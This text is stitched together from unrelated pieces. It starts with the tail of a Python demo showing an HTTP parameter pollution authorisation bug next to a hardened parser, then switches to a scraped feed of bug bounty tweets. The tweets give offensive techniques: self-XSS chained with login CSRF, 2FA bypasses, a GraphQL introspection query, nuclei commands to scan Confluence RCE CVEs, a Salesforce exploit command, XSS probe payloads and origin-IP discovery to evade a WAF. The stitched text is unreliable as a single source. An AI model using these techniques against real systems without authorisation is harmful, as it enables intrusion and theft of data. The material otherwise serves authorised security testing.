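def parse_strict(query: str) -> dict:
    """Parse a query string, refusing any key that appears more than once so
    that no later component can pick a different copy than the one checked."""
    params = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key in params:
            raise DuplicateParameterError(f"duplicate parameter: {key}")
        params[key] = value
    return params


def first_value(query: str, key: str):
    return next((v for k, v in parse_qsl(query, keep_blank_values=True) if k == key), None)


def last_value(query: str, key: str):
    values = [v for k, v in parse_qsl(query, keep_blank_values=True) if k == key]
    return values[-1] if values else None


# Constructed data store and the payload shape from the post.
RECORDS = {
    "victim-1": {"email": "victim@example.test"},
    "attacker-9": {"email": "attacker@example.test"},
}
POLLUTED_QUERY = "userID=victim-1&Limit=20&userID=attacker-9"


def vulnerable_lookup(query: str, caller_id: str):
    """Models the bug: the access check reads the last userID, the data fetch the first."""
    if last_value(query, "userID") != caller_id:
        return 403, None
    return 200, RECORDS.get(first_value(query, "userID"))


def hardened_lookup(query: str, caller_id: str):
    """Single parse, duplicates rejected, and the same value is used for both
    the authorization decision and the fetch."""
    try:
        params = parse_strict(query)
    except DuplicateParameterError:
        return 400, None
    user_id = params.get("userID")
    if user_id != caller_id:
        return 403, None
    return 200, RECORDS.get(user_id)


if __name__ == "__main__":
    print("vulnerable:", vulnerable_lookup(POLLUTED_QUERY, "attacker-9"))
    print("hardened:", hardened_lookup(POLLUTED_QUERY, "attacker-9"))
```

Where a proxy forwards a payload to a second system, as proxyPayload does above, the strict parse has to happen at the boundary that makes the access decision, and the forwarded request should be rebuilt from the parsed values rather than passed through verbatim; otherwise the downstream parser's preference (first or last) decides who the request is really for.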
Found a pretty cool feature on @Netlas_io called the "Attack Surface Discovery Tool" to quickly map the external attack surface for large-scope targets. This helped me find some quick wins during a recent bug bounty engagement.
What’s awesome? It provides a complete overview of an organization's external attack surface. The best part? You can use multiple identifiers to search for correlated data, such as:
🔍 Domain Name
🔍 ASN
🔍 IP Address
🔍 CIDR
🔍 Organization Name
🔍 Person
🔍 Favicon
Here's how it can help in bug bounty hunting with different correlation points:
📌 Domains with similar Organization name: Identifies all other associated root/sub domains via WHOIS, PTR records, nameservers, IP ranges, etc.
📌 Networks with the Same Organization: Maps associated networks, IP ranges, ASNs, and more tied to the organization.
📌 Hosts from Responses by Organization: Discovers domain names, TXT records, mail servers, nameservers, ASNs, WHOIS emails, etc., linked to the target.
📌 Abuse Emails/ASNs/DNS Records/SSL Certs: Leverages unique identifiers for uncovering related external-facing assets.
And many more correlation data points!
#Netlas #BugBountyTips #HackerOne #BugCrowd #Intigriti #YesWeHack
2
39
258
18,154
🔒 Question of the day: How to exploit Self-Stored XSS issues?
Have you ever stumbled upon a self-stored XSS but it's just for your session? Well, you're in for a surprise! Self XSS issues might be overlooked because they are not accepted by programs, but they can be quite the treasure, netting you anywhere from $250 to $1000, depending on the impact. Assuming you've discovered a vulnerability like this, usually in profile pictures, addresses, or names, etc., here's how you can exploit these issues:
1️⃣ First, ensure the target app's login functionality is vulnerable to CSRF. You can chain a Login CSRF to forcibly log a victim into your attacker account that houses the self-stored XSS payload. This transforms it into Stored XSS, letting you run malicious JS within the victim's session context.
2️⃣ Another trick up your sleeve: CSRF with a password reset. If the system auto-logs in after a successful password reset, you can forcibly log a victim into the attacker-controlled account to execute the self XSS payload.
3️⃣ Check for OAuth login endpoints that might be vulnerable to CSRF. Use them to forcefully log users into the attacker account for executing your malicious XSS payload.
4️⃣ Some sites use session tokens or other redirects to log in users, and these are often susceptible to CSRF. Chain them to exploit the self XSS by forcefully logging victims into your attacker-controlled account.
5️⃣ If none of the above works, don't worry! We have more explicit tricks up our sleeves, which we'll tweet about soon!
Takeaway: Don't underestimate self-stored XSS issues. They can be chained and exploited for substantial rewards. 💰💻
#HackerOne #BugCrowd #BugBountyTips #SecurityTips #TipOfTheDay #QuestionOfTheDay #InfoSec #Follow
13
43
239
24,790
Here’s how I discovered a critical issue on a wide-scope program using @netlas_io 👇 The target had a pretty generic login flow via a 3rd-party service with specific keywords. It was pretty much using the same codebase reused across multiple assets. I used netlas.io to do a quick response search with a keyword unique to my target's login page. Here's the query I used: http.body:("<keywords_from_login_page_of_my_target>") The above search returned an EC2 IP with port 80/443 open. This IP had no direct connection to my target via CIDR, WHOIS, SSL certs, or domains and looked completely unaffiliated with the target I was hunting on. But I could tell from the login flow immediately that it was identical to the one used by the company. Turns out the exposed instance had sign-up enabled, which allowed me to log in and dropped me straight into an admin panel exposing massive PII and internal dashboards. I suppose the key takeaway here is to not limit your recon to basic organization-wide searches like WHOIS, CIDRs, or SSL certificates. Sometimes, targeting unique application fingerprints such as specific UI text or JavaScript snippets can help uncover untracked assets.
5
37
244
14,418
I believe collaboration is key and a great opportunity for people to work together and also to learn a lot from each other. Please feel free to reach out if you'd like to work together on anything you've identified and need further assistance or wide-scale exploitation assistance with. Some of the examples are:
- Got invited to a newly launched bug bounty program but can't find any bugs on it, or you have already exhausted all bugs and can't find anything else?
- Struggling with crafting an XSS payload due to a WAF, e.g. Akamai, Cloudflare, etc.?
- Found a cache deception / poisoning issue but unable to exploit it further?
- Need assistance in escalating XSS to ATO?
- Found an interesting endpoint or a specific wordlist/bypass that works on multiple targets and you would like to check that against my list of targets?
- Found a bug on a specific product (e.g. WordPress, cPanel, etc.) and want to identify other targets affected by it?
- Looking to run your custom nuclei checks against my targets to see if there are any hits?
- Everything else!
Drop me a DM or leave a comment if you would like to collaborate on any of the above. I will be happy to connect and take this forward! Thanks!
41
11
238
18,273
"If you're consistently finding bugs but not earning much, it's not a question of skill—you're just not targeting the right programs." It’s eye-opening that your $250 XSS could be worth $10-30k elsewhere. While you're probably making $2,500 from 10 XSS reports, someone else is earning over $100k for the same amount of reports. The key? Targeting high-paying programs and escalating those bugs to account takeovers. If you're unsure how to escalate, collaborate with someone who knows and split the reward. It’s not just about the money—you’ll end up making more in the long run. My best advice: broaden your scope, team up with others, and start checking out these lucrative programs: 🛒 Amazon 🛍️ Shopify 📹 Zoom ✍️ Grammarly 🎮 Epic Games Feel free to drop more well-paying programs in the comments below! #BugBountyTips #HackerOne #Bugcrowd #YesWeHack #Intigriti #InfoSec #EthicalHacking #BugBounty #CyberSecurity #AppSec
8
23
238
18,227
🚀Question of the day: How to approach GraphQL Targets?
Unlock the full potential of GraphQL with these pro tips for tackling your bug bounty targets:
1️⃣ Retrieve the GraphQL Schema for hidden Queries/Mutations: If introspection is enabled, you can obtain the GraphQL Schema, revealing all GraphQL Operations and Mutations using the following GraphQL Query:
{"query":"{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
Introspection Disabled? Don't worry; here are some more ideas that can help you uncover those hidden GraphQL Queries/Mutations:
1️⃣ JavaScript - Retrieve GraphQL Queries and Mutations from JavaScript files when introspection is disabled. These files may list hidden methods not accessible via the app's regular functionality. Try making direct requests to these.
2️⃣ GraphQL Operation discovery via Brute Force - Clairvoyance is an excellent tool that helps obtain the GraphQL API schema via brute force even if introspection is disabled. It produces the GraphQL schema in JSON format. You can install the tool at github.com/nikitastupin/clai….
3️⃣ View the Schema and Continue Testing - Upload the identified operations/schema to other tools such as GraphQL Voyager, InQL, or graphql-path-enum, and start testing for GraphQL-specific security issues.
Next up: We'll talk about JS monitoring for identifying new GraphQL Operations/Mutations that you can be alerted to and test as soon as they're discovered! 🚀💻
#BugBounty #InfoSec #GraphQL #Security #BugBountyTips #HackerOne #BugCrowd #Cybersecurity
10
55
234
22,166
🚨 Hurry! A new Nuclei template for Atlassian Confluence Server - CVE-2023-22518 is now available by iamnoooob, rootxharsh, pdresearch. Scan your Confluence targets using the following command and ethically report any quick wins: nuclei -l targets.txt -t CVE-2023-22518.yaml Here's the link to the template - raw.githubusercontent.com/pr… Enjoy! #cybersecuritytips #bugbountytips #securitytips #hackerone #bugcrowd #bounty #tips
2
26
234
25,370
Kudos to @SaltSecurity for the eye-opening article on OAuth misconfiguration that could compromise millions of accounts. This issue persists, as I've discovered a few instances. TLDR: OAuth flaw via 'Login with Facebook' impacts thousands of services. Attackers can exploit tokens from an attacker-controlled app with user interaction to hijack target site accounts due to OAuth misconfigurations. 🔗 Read the full article for a deep dive: salt.security/blog/oh-auth-a… #CyberSecurity #OAuthSecurity #bugbounty #hackerone #securitytips
5
45
229
21,097
🎯Bug Bounty Tips: Common vulnerabilities on apps that support blocking users
When targeting apps with user-blocking features, you can unearth potential issues that could lead to quick bounties. Here's an in-depth look at the strategies:
1️⃣ Dive into Documentation - Start by thoroughly examining the app's documentation. Understanding what actions are permitted or prohibited for blocked users is crucial.
2️⃣ Mentioning Users - Test whether mentioning the victim with '@' using a blocked account triggers notifications for the victim. This could be a bug since no interaction should occur via a blocked user.
3️⃣ Leave Comments - Try adding comments as a blocked user on the victim's activities or posts. Look for any unexpected behaviors or security gaps.
4️⃣ Liking Content - Experiment with liking the victim's activities or posts as a blocked user. Determine if the platform allows this action, which could lead to issues.
5️⃣ Replies and Interactions - Explore the possibility of replying to someone's comment as a blocked user on the victim's content. Any interactions that occur can be potential vulnerabilities.
6️⃣ Direct Messaging - Send direct messages or chat messages to the victim using the blocked user account. Observe if the messages are delivered and received successfully, as this could indicate security flaws.
These are tried-and-tested methods I've employed over the years. Want to uncover even more insights? Stay tuned for forthcoming tweets! 🕵️‍♂️💰
#BugBounty #InfoSec #EthicalHacking #Cybersecurity #BugBountyTips
8
49
226
13,803
🔍Question of the day: Struggling with dupe results in your Nuclei scans? 📊
Here are some pro tips to help you maximize your bug bounty efforts and stand out from the crowd! 🔒
1️⃣ Be the early bird: Monitor new template additions on github.com/projectdiscovery/… Automate this process and scan your target list automatically to stay ahead of the game and reduce dupes.
2️⃣ Explore new scopes: Keep an eye on fresh bug bounty program invites or newly discovered domains/subdomains. Scanning these early can yield unique findings.
3️⃣ Expand your attack surface: Why limit yourself to just one platform? You can broaden your horizons by hunting across multiple platforms! 🎯 Keep an eye on bug bounty assets from various platforms, including new additions, through this link: github.com/arkadiyt/bounty-t…
4️⃣ Create custom templates: Craft personalized Nuclei templates tailored to your expertise or unexplored niches. Use AI capabilities at templates.nuclei.sh/template… for automatically creating your private nuclei templates.
5️⃣ Stay updated: Follow @infosec_au and his team and other known accounts for tracking the latest vulnerabilities. Monitor assetnote.io/research/rss.xm… for new disclosures, and be the first to create and run Nuclei templates based on their published PoCs. You can use templates.nuclei.sh/template… for automatically building the template based on the PoC.
While this may not cover everything and there are other advanced techniques or ways to gain a competitive edge over others, following these common best practices can still yield good results. 🕵️‍♂️💻
#BugBounty #Nuclei #SecurityResearch #hackerone #bugcrowd #bugbountytips #securitytips
11
45
216
28,133
It's wild how a $50 bounty a few years ago felt more exciting than a $10,000 bounty in 2025. I can't be the only one feeling that way... right? 🤔🤔
19
5
222
18,386
🔍 Bug Bounty Tips: Automate tracking scope changes for your HackerOne/BugCrowd Private Programs
Are you on the quest for an edge in your private H1/BugCrowd programs, ensuring you're always in the know about scope changes and additions? Look no further than @sw33tLie's excellent tool - github.com/sw33tLie/bbscope. This nifty utility streamlines the process of fetching HackerOne/Bugcrowd target lists from your public/private invites. Please note that you'll need to generate API tokens from HackerOne/BugCrowd to make the most of this tool.
Here's how you can install this tool: 👇
GO111MODULE=on go install github.com/sw33tLie/bbscope@…
Here's how you can leverage this tool:
Step 1: Retrieve all in-scope targets from your HackerOne programs that offer rewards: 🎯
bbscope h1 -t <YOUR_TOKEN> -u <YOUR_H1_USERNAME> -b -o t
Sample output: 📋
app[.]example[.]com
*.user.example.com
*.demo.com
www[.]something[.]com
Step 2: Do the same for your private Bugcrowd programs with rewards: 🔒
bbscope bc -t <YOUR_TOKEN> -b -p -o t
What comes next?
1️⃣ Automate your scope monitoring: Periodically check your target list, compare it with the previous version, and spot scope changes or newly added assets.
2️⃣ Enhance your checks: Incorporate the new scope and targets into your automated testing, including recon, subdomain takeover checks, httpx, port scanning, nuclei checks, fuzzing, and more.
3️⃣ Dive into action: Start hunting on these fresh targets, uncover vulnerabilities, and secure those lucrative bounties!
Key Takeaways: Continuous automated scope tracking gives you a competitive edge, allowing you to explore uncharted territory and find vulnerabilities before others. Be the pioneer, discover unique issues, and reap substantial rewards! 🚀💰
#BugBounty #InfoSec #Automation #Cybersecurity #BugBountyTips #HackerOne #BugCrowd
2
51
212
13,475
Happy to help🤝🤝💰💰 Here's the Salesforce hacking tips tweet, in case you missed it - nitter.app/Jayesh25_/status/17201… If you've found one of my tweets that helped you secure your bounty, feel free to share. I'll tag you unless you wish to remain anonymous.
Hunting on a target with a Salesforce site? 🕵️‍♂️ You're in luck! 🍀 There's a high likelihood of stumbling upon a misconfigured object that could yield bounties ranging from $1,000 to $5,000 due to the sensitive nature of the data. 😲 Don't be fooled, many hunters overlook these targets, assuming they're safe behind a login page. 😅 However, they're actually one of the most common issues I encounter. Here's a simple approach to spot these vulnerabilities:
1️⃣ Install this amazing tool - 🔧 github.com/moniik/poc_salesf…
2️⃣ Run python3 exploit.py -u https://{{target(.)com -d -s
3️⃣ The tool will automatically scan for object misconfigurations and display objects with result counts.
4️⃣ Found any interesting objects with a result count >0? 🧐
5️⃣ You can explore further in this nice article - 📖 infosecwriteups.com/in-simpl… to exploit the misconfiguration.
Hope this helps you on your bug bounty journey. 🚀 Enjoy! 🤑
#CyberSecurity #SecurityTips #BugBountyTips #HackerOne #BugCrowd #DailyTips #Bounties #Bounty
🤖 The Reality of Bug Hunting Automation 🕵️‍♂️

">95% automated finds often lead to duplicates! 😱 Skilled automators are everywhere."

🔎 Unfortunately, this is one of the most commonly asked questions by new fellow researchers, often seeking automation strategies in hopes of quick earnings. However, the harsh reality is that these common misconceptions can result in individuals finding no issues at all, potentially causing them to abandon their bug bounty journey.

In my experience:
(1) I am sitting on 100+ XSS issues, 20+ subdomain takeovers, and not even bothering to report, as I know they'll be duplicates (I know this for a fact cause these are way too obvious)
(2) Reported a manual XSS on a new scope within 60 mins; it was marked "Dupe" as someone else got it in 15 (that goes to show the level at which people are automating stuff)
(3) More than 1000+ Low/Medium findings with nuclei unreported due to high likelihood of dupes.

Automation isn't always the answer. However, it doesn't mean you should avoid automation altogether. There are still effective approaches to make it yield results.

Next tweet: Unveiling the scenarios where automation can help. Stay tuned! 💡
#BugBounty, #Hackerone, #securitytips, #bugcrowd, #Security
🐞💰 100+ Reports, $150k+ Bounties: The Collaborative Bug Bounty Journey 🚀 Used to believe solo was the way, but that all changed after attending @Hacker0x01's live hacking event in London. 💡Collaboration is KEY in bug bounties! Since then, I've connected with amazing folks, partnering up and making over $150k in the last 3 months with 100+ submissions to multiple programs. Big shoutout to my collab partners: @monkehack, @H4cktus, @bendtheory, @Shlibness, @soiaxx, and many more. 💪#BugBounty #PowerOfCollaboration #HackerOne, #Bugcrowd, #bugbountytips, @securitytips If you ever find yourself stuck, don't hesitate to reach out. You'd be amazed at the talented people around you ready to help! 💼💡
🔐 Question of the Day: How to bypass 2FA?

Here are some of the known techniques using which you could bypass 2FA on a target app.
1️⃣ Password Reset - Initiate a password reset, follow the link, reset the password, and observe if it grants immediate access to the victim's account without having to go through 2FA.
2️⃣ Partial Authentication - Log in using credentials, inspect if the server issues session cookies or JWT tokens, yet still prompts for 2FA. In such cases, attempt utilizing the JWT/session cookies on the target app APIs without circumventing 2FA – it may just work.
3️⃣ OAuth Login - Check if the target app supports logins via platforms like Google or Facebook. Attempt logging in via a compromised OAuth platform and check if it still asks you for 2FA or lets you in directly.
4️⃣ Rate Limit Gap - Examine the 2FA implementation for proper rate limits. If it lacks these limits, consider a brute force attack to guess the correct OTP.
5️⃣ Legacy Paths - Explore if the target app has legacy subdomains or outdated mobile apps that might still be using older login endpoints without 2FA enforcement. These routes could provide a 2FA bypass.
6️⃣ Race Condition Magic - During the authentication process, the app might briefly transition through a state where the user holds a valid logged-in session, but 2FA isn't enforced. An attacker could potentially exploit this by sending a login request alongside a request to a sensitive, authenticated endpoint with the valid session, which may result in a successful bypass.

Keep in mind that some programs may categorize these issues as "Informative" because of their high attack complexity, requiring access to the victim's username/password as a prerequisite for these attacks.

Stay ethical and responsible! 💡🔒 Please feel free to share your 2FA bypass ideas in comments below!
#cybersecurity #2FA #bugbounty #infosec #ethicalhacking #bugbountytips
🔍 Question of the Day: How do I hunt for vulnerabilities – manual or automated? 🕵️‍♂️ 👉 I'd say it's a blend! I uncover 1-2 automated Issues a month (that's approx. 2-3k 💰), but the real fun lies in manual finds! Top picks? Insecure Direct Object Reference, Cross Site Request Forgery, and RBAC Issues, which is 10x more :) Stay tuned for more! 💻✨ #CyberSecurity #BugBounty #hackerone
Congrats @imshehzadahmad! Keep up the great work!! Here's the original bug bounty tip tweet for reference for those that missed it -
Alhamdulillah! First P1 of the new year #2024 Full account takeover via Facebook sign-in, @Bugcrowd team take over my account while validation😂 @jayesh25 Thank you so much. Here, in my case there was a bit different trick, but the idea was the same. #infosec #bugbounty
Hi, Thank you to everyone who reached out to check on me. I apologize if I haven't been able to respond; I haven't been very active on X lately. I look forward to being more engaged moving forward! 💪💪 Thanks!
Scan your targets for CVE-2023-22527: Atlassian Confluence - Remote Code Execution

A template injection vulnerability on out-of-date versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on affected versions.

Scan your targets using the following command and ethically report any quick wins:
nuclei -l targets.txt -t CVE-2023-22527.yaml

Here's the nuclei template from @pdiscoveryio - raw.githubusercontent.com/pr…
#CybersecurityTips #BugBountyTips #SecurityTips #HackerOne #BugCrowd #Bounty #Tips
Here's a technique I use to maximize results and avoid VPS abuse reports while testing for automated XSS or similar vulnerabilities. Malicious payloads are often blocked outright by WAF providers like Akamai, Cloudflare, etc., meaning you won’t even get a chance to work on a WAF bypass—your request will likely be blocked before it even reaches your automated alert. While this approach has some limitations, instead of using intrusive payloads like "><img src='x' onerror='alert(1)', try simplified payloads like "><xss or '"><xss to detect unsanitized reflection. You might need to tweak your existing Nuclei templates, but it’s worth the effort. Once you confirm the target is vulnerable, you can manually test with a true XSS payload or work on bypassing the WAF. :)
💡Do you skip Android apps during bug hunting? You might be missing out on hidden bugs! 🐛

I've had conversations with several hunters who lack confidence or overlook mobile apps, but Android apps often have hidden endpoints or API calls not visible in the web interface. This could mean missing out on valuable findings.

🔍 To discover these, try dynamic analysis: run the app on your device/Genymotion, intercept traffic using tools like Charles Proxy or mitmproxy. Inspect all API calls and unusual behavior and perform further testing on these to look for IDORs, RBAC, CSRFs, etc.

📂 For static analysis, tools like MobSF allow you to review Java classes for discovering hidden endpoints, or you can extract URLs directly from APKs using apkurlgrep or apk2url.

I've often found High/Critical bugs in Android apps when the web version had no issues. The takeaway? Always check mobile apps during bug bounties!
#BugBountyTips #MobileSecurity #Android #AppSec #BugBounty #HackerOne #BugCrowd #Recon #Intigriti #Yeswehack
That is awesome - Congrats @skyhex_ and thanks for sharing🎉🥳 Here's the link to the original bug bounty tip tweet for reference In case you missed it -
Thank you so much @jayesh25 for this cool #Bugbounty tip! 🙌🏻
Since I'm receiving a lot of questions; here's how you can disallow sharing email when using Login with Facebook:
(1) Login with Facebook to any app
(2) Click "Edit Access"
(3) Uncheck email address checkbox
(4) `Continue`
Using Netlas to Identify the Origin IP of your target 🌐 - There are many known ways to find Origin IPs, but sometimes none of those techniques work. I had a potential SQLi that couldn't be validated due to a really strict WAF 🛡️. After spending hours trying different methods, nothing worked. Then I casually navigated to Netlas, did an HTTP response search using http.title:"My_target_title" (since it was unique to that self-hosted service), and to my surprise, it returned an IP address with the same title, which turned out to be the Origin IP! This helped me bypass the WAF and confirm the SQLi, which I then reported to the program ✅. Moral of the story: you don't always need to rely on running complicated self-hosted tools. If you've got the right ones in your toolkit, use their full features and you'll likely find what you're looking for 🔎. #Netlas #BugBounty #HackerOne #BugCrowd #YesWeHack #Intigriti 🕵️‍♂️